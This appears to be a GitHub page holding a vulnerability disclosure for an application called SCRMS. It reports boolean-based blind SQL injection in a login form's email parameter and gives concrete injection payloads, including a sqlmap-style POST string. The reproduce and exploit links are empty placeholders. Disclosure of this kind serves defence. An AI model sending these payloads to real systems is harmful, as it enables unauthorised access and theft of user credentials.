Skip to content

Latest commit

 

History

History

SCRMS-2023-05-27-1.0

Folders and files

NameName
Last commit message
Last commit date

parent directory

..
 
 
 
 

Description:

The email parameter appears to be vulnerable to SQL injection attacks. The test payloads 45141002' or 6429=6429-- and 37491017' or 5206=5213-- were each submitted in the email parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way. The attacker can easily steal all users and their passwords for access to the system. Even if they are strongly encrypted this will get some time, but this is not a problem for an attacker to decrypt if, if they are not enough strongly encrypted.

STATUS: HIGH Vulnerability

[+]Payload:

---
Parameter: email (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: email=-1544' OR 2326=2326-- eglC&password=c5K!k0k!T7&login=
---

Reproduce:

href

Proof and Exploit:

href

Time spend:

01:00:00